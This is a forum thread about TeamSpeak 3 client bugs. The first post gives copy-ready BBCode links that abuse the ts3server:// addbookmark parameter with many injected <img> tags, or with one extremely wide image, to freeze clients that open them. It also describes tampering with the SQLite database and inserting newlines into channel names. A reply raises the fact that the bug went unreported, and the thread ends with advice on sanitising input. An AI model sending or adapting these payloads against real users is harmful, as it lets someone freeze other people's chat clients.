TeamSpeak 3 addbookmark client freeze

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
Code:
[url=ts3server://localhost?addbookmark=<img%20source=//a/a><img%20source=//b/b><img%20source=//c/c><img%20source=//d/d><img%20source=//e/e><img%20source=//f/f><img%20source=//z/z><img%20source=//w/w><img%20source=//zz/zz><img%20source=//ad/ad><img%20source=//ffa/ffa><img%20source=//a3/33a><img%20source=//aa43/fa33a><img%20source=//awfea/2343aa><img%20source=//awfe22a/232243aa><img%20source=//awf90ea/234903aa><img%20source=//awz4fea/23443fgaa><img%20source=//ab54wfea/2343z45aa><img%20source=//azas46wfea/234365aaa><img%20source=//awff35ea/2343aawa23a><img%20source=//awfa344ea/245343aa>&nickname=UserNickname]https://www.youtube.com/watch?v=ZbZSe6N_BXs[/url]

This could possibly cause Windows clients to freeze up (thinking related to network shares).

Also, apparently if you get a wide enough image that'll do rather well:
Code:
[url=ts3server://localhost?addbookmark=<img%20width=2000000%20source=//a/a>&nickname=UserNickname]https://www.youtube.com/watch?v=ZbZSe6N_BXs[/url]

...

lastly, I found editing the SQLite DB to contain a server nickname with a bunch of messed up <img> sourcing (src=) top-like.. will cause freezing on connect to a server. This does require user interaction of course but is a good example of how TeamSpeak still has some work to make their software safer and more free from bugs.

Even more, channel and server names permit editing in newline characters which distort the list showing server/channel name(s).
 

BennetGallein

New Member
Jun 9, 2019
7
3
8
Is this reported to TeamSpeak already? It is against ethical standards to just publish such an important vulnerability without giving the company time to respond.
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
Another QT bug. Teamspeak needs to just drop QT.
That’s partially true, it is the QT developer’s job to responsibly handle inputs. For example, where QT renders html, maybe strip all HTML characters e.g. “<“ and “>” along with the url encoded equivalents just for double measure.

Validate, sanitize, and just make all input and output clean. When developers overlook the in and out they get lions mixed up with sheep.
 
Top